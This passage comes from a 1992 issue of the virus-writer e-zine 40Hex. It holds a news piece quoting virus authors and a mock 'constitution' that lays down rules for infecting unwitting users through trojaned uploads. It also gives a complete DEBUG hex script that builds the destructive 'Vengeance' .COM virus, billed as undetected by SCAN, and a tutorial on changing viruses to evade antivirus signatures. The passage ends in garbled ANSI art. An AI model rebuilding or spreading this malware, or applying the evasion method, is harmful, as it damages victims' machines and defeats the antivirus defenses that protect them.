  488.          "The main difference is that an author may write a virus and may even
  489.     upload that virus to a virus board, a [bulletin Board system] oriented to
  490.     virus programmers and spreaders," one virus author explained.
  491.          "People, like a disgruntled employee who may have a gripe with
  492.     someone else, download it and spread it that way," this virus author said.
  493.  
  494.     NOT LAWBREAKERS
  495.     ---------------
  496.          The virus authors also pointed out that since the act of writing a
  497.     virus is not prohibited by law, they should not be viewed as criminals.
  498.          The callers claimed that even if the group stopped writing viruses,
  499.     the number of infections would not decline.  The problem of viruses has
  500.     grown so large that new viruses have no impact overall, one said.
  501.          "Our effect is fairly little," he asserted.
  502.          The callers said that they have been writing viruses for about a
  503.     year, and would probably continue for at least another year.  Eventually,
  504.     they hope to find jobs as full time programmers, several said.
  505.          There is no way to verify the callers' claims.  However, many of the
  506.     monikers the callers used, as well as the name "Phalcon/Skism," have shown
  507.     up in perhaps as many as half  -  about 100  -  of the viruses to appear
  508.     in the past six or seven months, said John McAfee, president of McAfee
  509.     Associates, an antivirus software publisher based in Santa Clara,Calif.
  510.          The quality of the viruses is "mediocre," Mcafee said. (* Cant win
  511.     'em all can we, John? *)
  512.     ---------------------------------------------------------------------------
  513.  
  514.     My thoughts on the article was that it was neutral, Mr. Alexander could
  515.     have easily ripped us apart.  We didnt expect to come out looking like
  516.     heros, so why should we bitch.  Next month prepare for the official
  517.     transcript of the interview.  Then we can truly establish what was said.
  518.  
  519.                                                 -)GHeap
  520.  
  521.  
  522. 40Hex Number 5 Volume 2 Issue 1                                      File 005
  523.  
  524.                   ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
  525.                   The Constitution of Worldwide Virus Writers
  526.                   ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
  527.                       Initial Release - February 12, 1992
  528.                   ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
  529.   
  530.        We, the members of PHALCON/SKISM, in order to form a more perfect
  531.   environment worldwide for the virus community, establish justice, ensure
  532.   intracommunity tranquility, provide for the common defense and offense,
  533.   promote the general welfare, and secure the blessings of liberty to
  534.   ourselves and our posterity, do ordain and establish this Constitution of
  535.   Worldwide Virus Writers.
  536.   
  537.        ARTICLE I - REGARDING ORIGINAL VIRII
  538.             Section A - DEFINITION
  539.                  The term "original virus" herein indicates programming done
  540.                  exclusively by either one individual or group, with no code
  541.                  taken from any other source, be it a book or another virus.
  542.             Section B - CODE REQUIREMENTS
  543.                  For an original virus to conform to the standards set by
  544.                  this document, it must include the following:
  545.                    1) The title of the virus in square brackets followed by a
  546.                       zero byte should be in the code, in a form suitable for
  547.                       inclusion into SCAN(1).  This is to ensure that the
  548.                       name of the virus is known to those examining it.
  549.                    2) The name of the author and his/her group affilition/s
  550.                       should be included in the code, followed by a zero
  551.                       byte.  At the present, this is an optional requirement.
  552.                    3) Some form of encryption or other form of stealth
  553.                       techniques must be used.  Even a simple XOR routine
  554.                       will suffice.
  555.                    4) If the virus infects files, the code should be able to
  556.                       handle infection of read only files.
  557.                    5) It must have some feature to distinguish it from other
  558.                       virii.  Creativity is encouraged above all else.
  559.                    6) The virus must not be detectable by SCAN.
  560.             Section C - IMPLEMENTATION
  561.                  This section, and all sections hereafter bearing the heading
  562.                  "IMPLEMENTATION" refer to the recommended method of
  563.                  implementation of the suggestions/requirements listed in the
  564.                  current article.
  565.                    1) Virus_Name db '[Avocado]',0
  566.                    2) Author     db 'Dark Angel, PHALCON/SKISM',0
  567.   
  568.        ARTICLE II - REGARDING "HACKED" VIRII
  569.             Section A - DEFINITION
  570.                  The term "hacked virus" herein refers to any virus written
  571.                  by either one individual or a group which includes code
  572.                  taken from any other source, be it a book, a code fragment,
  573.                  or the entire source code from another virus.
  574.                  The term "source virus" herein refers to the virus which
  575.                  spawned the "hacked virus."
  576.             Section B - CODE REQUIREMENTS
  577.                  For a "hacked" virus to conform to the standards set forth
  578.                  by this document, it must include the following, in addition
  579.                  to all the requirements set down in Article I of this
  580.                  document:
  581.                    1) The title, author (if available), and affiliation of
  582.                       the author (if available) of the original virus.
  583.                    2) The author of the hacked virus must give the source
  584.                       code of said virus to the author of the source virus
  585.                       upon demand.
  586.                    3) No more Jerusalem, Burger, Vienna, Stoned, and Dark
  587.                       Avenger hacks are to be written.
  588.                    4) The source virus must be improved in some manner
  589.                       (generally in efficiency of speed or size).
  590.                    5) The hacked virus must significantly differ from the
  591.                       source virus, i.e. it cannot be simply a text change.
  592.             Section C - IMPLEMENTATION
  593.                    1) Credit db 'Source stolen from Avocado by Dark Angel of
  594.                       PHALCON/SKISM',0
  595.   
  596.        ARTICLE III - REGARDING VIRAL STRAINS
  597.             Section A - DEFINITION
  598.                  The term "viral strain" herein refers to any virus written
  599.                  by the original author which does not significantly differ
  600.                  from the original.  It generally implies a shrinking in code
  601.                  size, although this is not required.
  602.             Section B - CODE REQUIREMENTS
  603.                  For a "viral strain" to conform to the standards set by this
  604.                  document, it must include the following, in addition to all
  605.                  the requirements set down in Article I of this document:
  606.                    1) The name of the virus shall be denoted by the name of
  607.                       the original virus followed by a dash and the version
  608.                       letter.
  609.                    2) The name of the virus must not change from that of the
  610.                       original strain.
  611.                    3) A maximum of two strains of the virus can be written.
  612.             Section C - IMPLEMENTATION
  613.                    1) Virus_Name db '[Avocado-B]',0
  614.   
  615.        ARTICLE IV - DISTRIBUTION
  616.             Section A - DEFINITION
  617.                  The term "distribution" herein refers to the transport of
  618.                  the virus through an infected file to the medium of storage
  619.                  of a third (unwitting) party.
  620.             Section B - INFECTION MEDIUM
  621.                  The distributor shall infect a file with the virus before
  622.                  uploading.  Suggested files include:
  623.                    1) Newly released utility programs.
  624.                    2) "Hacked" versions of popular anti-viral software, i.e.
  625.                       the version number should be changed, but little else.
  626.                    3) Beta versions of any program.
  627.                  The infected file, which must actually do something useful,
  628.                  will then be uploaded to a board.  The following boards are
  629.                  fair game:
  630.                    1) PD Boards
  631.                    2) Lamer boards
  632.                    3) Boards where the sysop is a dick
  633.                  No virus shall ever be uploaded, especially by the author,
  634.                  directly to an antivirus board, such as HomeBase or
  635.                  Excalibur.
  636.             Section C - BINARY AND SOURCE CODE AVAILABILITY
  637.                  The binary of the virus shall not be made available until at
  638.                  least two weeks after the initial (illicit) distribution of
  639.                  the virus.  Further, the source code, which need not be made
  640.                  available, cannot be released until the latest version of
  641.                  SCAN detects the virus.  The source code, should it be made
  642.                  available, should be written in English.
  643.             Section D - DOCUMENTATION
  644.                  Documentation can be included with the archive containing
  645.                  the binary of the virus, although this is optional.  The
  646.                  author should include information about the virus suitable
  647.                  for inclusion in the header of VSUM(2).  A simple
  648.                  description will follow, though the author need not reveal
  649.                  any "hidden features" of the virus.  Note this serves two
  650.                  purposes:
  651.                    1) Enable others to effectively spread the virus without
  652.                       fear of self-infection.
  653.                    2) Ensure that your virus gets a proper listing in VSUM.
  654.   
  655.        ARTICLE V - AMENDMENTS
  656.             Section A - PROCEDURE
  657.                  To propose an amendment, you must first contact a
  658.                  PHALCON/SKISM member through one of our member boards.
  659.                  Leave a message to one of us explaining the proposed change.
  660.                  It will then be considered for inclusion.  A new copy of the
  661.                  Constitution will then be drafted and placed on member
  662.                  boards under the filename "PS-CONST.TXT" available for free
  663.                  download by all virus writers.  Additionally, an updated
  664.                  version of the constitution will be published periodically
  665.                  in 40HEX.
  666.             Section B - AMENDMENTS
  667.                  None as of this writing.
  668.   
  669.        ARTICLE VI - MISCELLANEOUS
  670.             Section A - WHO YOU CAN MAKE FUN OF
  671.                  This is a list of people who, over the past few years, have
  672.                  proved themselves to be inept and open to ridicule.
  673.                    1) Ross M. Greenberg, author of FluShot+
  674.                    2) Patricia (What's VSUM?) Hoffman.
  675.                    2) People who post "I am infected by Jerusalem, what do I
  676.                       do?" or "I have 20 virii, let's trade!"
  677.                    3) People who don't know the difference between a virus
  678.                       and a trojan.
  679.                    4) Lamers and "microwares puppies"
  680.             Section B - WHO YOU SHOULDN'T DIS TOO BADLY
  681.                  This is a list of people who, over the past few years, have
  682.                  proved themselves to be somewhat less inept and open to
  683.                  ridicule than most.
  684.                    1) John McAfee, nonauthor of SCAN
  685.                    2) Dennis, true author of SCAN
  686.             Section C - MOTIVATION
  687.                  In most cases, the motivation for writing a virus should not
  688.                  be the pleasure of seeing someone else's system trashed, but
  689.                  to test one's programming abilities.
  690.        
  691.             
  692.                  
  693.                    
  694.   ²²²²²²²²²²
  695.   1 SCAN is a registered trademark of McAfee Associates.
  696.   2 VSUM is a registered trademark of that bitch who doesn't know her own
  697.     name.
  698. 40Hex Number 5 Volume 2 Issue 1                                      File 006
  699. -------------------------------------------------------------------------------
  700. PHALCON/SKISM Vengeance virus.                            Released  02/03/92
  701. Stats: Non-Resident .COM infector.                        in 40Hex Vmag
  702.        Infects files larger than 1992 bytes
  703.        Size of the virus is about 722 bytes
  704.  
  705.  
  706. Note: This Virus is dedicated to the memory of Digital Warfare BBS, which was
  707.       online up until January 20th, 1992.  On that fateful day, the BBS 
  708.       computer was confiscated by local authorities.  Hopefully the board will
  709.       come back up, and be as good as before...
  710.  
  711. This virus activates the 20th of every month.  Just for the fun of it, I'm not
  712. going to tell you what this thing does upon activation.  I will say one thing -
  713. unless you have suicidal tendencies, DON'T test it on your own machine, OR the
  714. machine of someone you love.  It ain't pretty.  It IS destructive. (286+)  
  715. It IS noisy.  And it IS named appropriately.
  716.   
  717. Text that can be found in the virus:
  718.  
  719.                          *** Vengeance is ours! ***
  720.  
  721.                              PHALCON/SKISM '92
  722.  
  723. As of Scan 86, this virus isn't found.  Since it is based on the Violator virus,
  724. other scanners may find it.  Oh well.  
  725.  
  726. Have fun with this one, just don't run it on the 20th...  at least, not on 
  727. YOUR machine!  
  728.  
  729.                          DecimatoR /PHALCON/SKISM 
  730.  
  731. -------------------------------------------------------------------------------
  732. n veng.com
  733. e 0100  EB 0F 90 90 90 90 90 90 90 90 90 90 90 90 90 90
  734. e 0110  90 51 BA 27 03 FC 8B F2 83 C6 3D BF 00 01 B9 03
  735. e 0120  00 F3 A4 8B F2 B8 0F FF CD 21 3D 01 01 75 03 E9
  736. e 0130  E3 01 06 B4 2F CD 21 89 5C 33 90 8C 44 35 07 BA
  737. e 0140  92 00 90 03 D6 B4 1A CD 21 90 06 56 8E 06 2C 00
  738. e 0150  BF 00 00 5E 56 83 C6 43 AC B9 00 80 F2 AE B9 04
  739. e 0160  00 AC AE 75 EE E2 FA 5E 07 89 7C 4E 8B FE 83 C7
  740. e 0170  52 8B DE 83 C6 52 8B FE EB 3D 83 7C 4E 00 75 03
  741. e 0180  E9 3F 01 1E 56 26 8E 1E 2C 00 90 8B FE 90 26 8B
  742. e 0190  75 4E 90 83 C7 52 90 90 AC 90 3C 3B 90 74 0B 90
  743. e 01A0  3C 00 74 03 AA EB F0 BE 00 00 5B 1F 89 77 4E 80
  744. e 01B0  FD 5C 74 03 B0 5C AA 89 7F 50 8B F3 83 C6 48 B9
  745. e 01C0  06 00 F3 A4 8B F3 B4 4E BA 52 00 03 D6 B9 03 00
  746. e 01D0  CD 21 EB 04 B4 4F CD 21 73 02 EB 9E 8B 84 A8 00
  747. e 01E0  24 1C 3C 1C 74 EE 81 BC AC 00 2D F7 77 E6 81 BC
  748. e 01F0  AC 00 C8 07 72 DE 8B 7C 50 56 81 C6 B0 00 AC AA
  749. e 0200  3C 00 75 FA 5E B8 00 43 BA 52 00 03 D6 CD 21 89
  750. e 0210  4C 3B B8 01 43 83 E1 FE BA 52 00 03 D6 CD 21 B8
  751. e 0220  02 3D BA 52 00 03 D6 CD 21 73 03 E9 87 00 8B D8
  752. e 0230  B8 00 57 CD 21 89 4C 37 89 54 39 B4 2C CD 21 B4
  753. e 0240  3F B9 03 00 BA 3D 00 03 D6 CD 21 72 53 3D 03 00
  754. e 0250  75 4E B8 02 42 B9 00 00 BA 00 00 CD 21 72 41 8B
  755. e 0260  C8 2D 03 00 89 44 41 81 C1 16 03 8B FE 81 EF 14
  756. e 0270  02 89 0D B4 40 B9 D3 02 8B D6 81 EA 16 02 CD 21
  757. e 0280  72 1E 3D D3 02 75 19 B8 00 42 B9 00 00 BA 00 00
  758. e 0290  CD 21 72 0C B4 40 B9 03 00 8B D6 83 C2 40 CD 21
  759. e 02A0  8B 54 39 8B 4C 37 83 E1 E0 83 C9 1C B8 01 57 CD
  760. e 02B0  21 B4 3E CD 21 B8 01 43 8B 4C 3B BA 52 00 03 D6
  761. e 02C0  CD 21 1E B4 1A 8B 54 33 8E 5C 35 CD 21 1F B4 2A
  762. e 02D0  CD 21 80 FA 14 75 3E B4 09 8B D6 83 C2 00 CD 21
  763. e 02E0  BA 80 00 32 ED B4 05 CD 13 80 FE 01 74 04 FE C6
  764. e 02F0  EB F3 80 FD 20 74 06 32 F6 FE C5 EB E8 80 FA 81
  765. e 0300  74 06 B2 81 32 F6 EB DB B8 09 25 CD 21 B4 02 B2
  766. e 0310  07 CD 21 EB F8 59 33 C0 33 DB 33 D2 33 F6 BF 00
  767. e 0320  01 57 33 FF C2 FF FF 0D 0A 2A 2A 2A 20 56 65 6E
  768. e 0330  67 65 61 6E 63 65 20 69 73 20 6F 75 72 73 21 20
  769. e 0340  2A 2A 2A 0D 0A 24 20 53 4B 49 53 4D 2F 50 68 61
  770. e 0350  6C 63 6F 6E 20 27 39 32 20 24 00 00 00 00 00 00
  771. e 0360  00 00 00 00 CD 20 90 E9 00 00 50 41 54 48 3D 2A
  772. e 0370  2E 43 4F 4D 00 00 00 00 00 00 00 00 00 00 00 00
  773. e 0380  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  774. e 0390  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  775. e 03A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  776. e 03B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  777. e 03C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  778. e 03D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  779. e 03E0  00 00 00 00 
  780. rcx
  781. 03E3
  782. w
  783. q
  784. -------------------------------------------------------------------------------
  785.  
  786. 40Hex Number 5 Volume 2 Issue 1                                      File 007
  787.  
  788.                 HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT
  789.                                 PART II
  790.   
  791.   
  792.   In Issue 1 of 40Hex, Hellraiser presented a simple (though incredibly
  793.   tedious) method of searching for scan strings.  In short, this was his
  794.   method:
  795.   
  796.     1) Make a small carrier file.
  797.     2) Infect the carrier with the virus.
  798.     3) Fill parts of the virus with a dummy value until you isolate the
  799.        scan string.
  800.     4) Modify the virus so it is not detectable, i.e. switch the order of
  801.        the instructions.
  802.   
  803.   The problem is, of course, that step 3 takes a maddeningly inordinate
  804.   amount of time.  I shall present a tip which will save you much time.
  805.   The trick is, of course, to find out where the encryption mechanism and
  806.   hence the unencrypted portion where the scan string is usually located.
  807.   Once the encryption mechanism is located, isolating the scan string is
  808.   much simpler.
  809.   
  810.   Of course, the problem is finding the encryption mechanism in the first
  811.   place.  The simplest method of doing this is using V Communication's
  812.   Sourcer 486, or any similar dissassembler.  Dissassemble the file and
  813.   search for the unencrypted portions.  Most of the file will be DBs, so
  814.   search for any part which isn't.  Once you have located those parts, all
  815.   you have to do is subtract 100h from the memory location to find its
  816.   physical offset in the file.  You now have a general idea of where the
  817.   scan string is located, so perform step 3 until you find it.
  818.   
  819.   Ack, you say, what if you don't have Sourcer?  Well, all is not lost.
  820.   Load up the infected carrier in good old DEBUG.  The first instruction
  821.   (in COM infections) should be a JMP.  Trace (T) into the JMP and you
  822.   should be thrown into the area around the encryption mechanism.  Use the
  823.   memory offset (relative to the PSP segment) and subtract 100h to find
  824.   the physical location of the unencrypted portion in the file.  Once
  825.   again, once you have this, perform step 3.  Simple, no?
  826.  
  827.   Sometimes, SCAN looks for the writing portion of the code, which
  828.   generally calls INT 21h, function 40h.  This is usually, though not
  829.   always, located somewhere near the encryption mechanism.  If it is
  830.   not near there, all you have to do is trace through the virus until
  831.   it calls the write file function.
  832.  
  833.   Another method of looking for scan codes is to break the infected carrier
  834.   file into a series of 50 byte overlapping chunks.  For example, the first
  835.   chunk would be from offset 0 to 49, the second from 24 to 74, the third
  836.   from 49 to 99, etc.  Then use SCAN to see which chunk holds the scan code.
  837.   This is by far the easiest, not to mention quickest, method.
  838.   
  839.   One side note on step 1, making the carrier file.  Some virii don't
  840.   infect tiny files.  What you must do is create a larger file (duh).
  841.   Simply assemble the following two lines:
  842.   
  843.       int 20h
  844.       db  98 dup (0)
  845.   
  846.   (with all the garbage segment declarations and shit, of course) and
  847.   you'll have a nice 100 byte carrier which should be sufficient in most
  848.   cases, with maybe the exception of the Darth Vaders.
  849.   
  850.   Enjoy!
  851. -------------------------------------------------------------------------------
  852.                                                                      Dark Angel
  853. HHHH                                                                  HHCÜÜÜÜÜÜ¥CÜÜ¥CÜÜ¥CÜÜÜÜÜÜÜ¥CÜÜ¥s
  854. uCÜÜÜÜÜÜ¥CÜÜÜÜÜÜÜ¥CÜÜÜÜ¥CÜÜ¥HCÜÜ¥ÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥s
  855. u₧₧ÜÜ¥CÜÜ¥CÜÜ¥₧₧₧₧ ÜÜ¥₧₧ÜÜ¥CÜÜ ÜÜ¥CÜÜ¥HCÜÜ¥CÜÜs
  856. u¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥ÜÜs
  857. u¥CÜÜ¥1HCÜÜÜÜÜÜ¥CÜÜÜÜÜÜÜ¥CÜÜÜÜÜÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜs
  858. u¥CÜÜ¥CÜÜ¥1HCÜÜ¥₧₧₧₧ ÜÜ¥₧₧ÜÜ¥CÜÜ¥₧₧ÜÜ¥CÜÜ¥CÜÜs
  859. u¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜ ÜÜ¥1HCÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜs
  860. u¥CÜÜÜÜÜÜ¥CÜÜÜÜÜÜ¥CÜÜÜÜÜÜÜ¥CÜÜ¥CÜÜÜÜ¥1HC₧₧₧C₧₧₧  ₧₧₧ ₧₧₧  ₧₧₧ ₧₧₧₧₧₧₧ ₧₧₧₧₧₧₧ ₧₧₧₧₧₧₧₧ ₧₧₧    ₧₧₧₧₧1H ÜÜÜÜs
  861. uÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜÜÜÜÜ¥CÜÜÜ¥CÜÜÜ¥CWorld Wide Virus1H ÜÜ¥₧₧₧₧ ÜÜs
  862. u¥CÜÜ¥₧ ÜÜ¥CÜÜ¥₧₧₧₧ ÜÜ Ü Ü ÜÜ¥CMakers/Distributors1H ÜÜÜÜÜÜ¥CÜÜÜÜ¥s
  863. u₧₧  ÜÜ¥CÜÜÜÜÜÜ¥CÜܥܥÜÜ¥1HC₧₧₧₧ÜÜ¥CÜÜ¥ÜÜ¥CÜÜs
  864. u¥C₧₧₧₧ÜÜ¥CÜÜ¥C₧₧ ÜÜ¥1HCÜÜÜÜÜÜ¥CÜÜ¥CÜÜ¥CÜÜ¥CÜÜÜÜÜÜ¥s
  865. uCÜÜ¥CÜÜ¥1HC₧₧₧₧₧₧₧ ₧₧₧  ₧₧₧ ₧₧₧ ₧₧₧₧₧₧₧ ₧₧₧    ₧₧₧1H                                                                   1H1H1H
  866.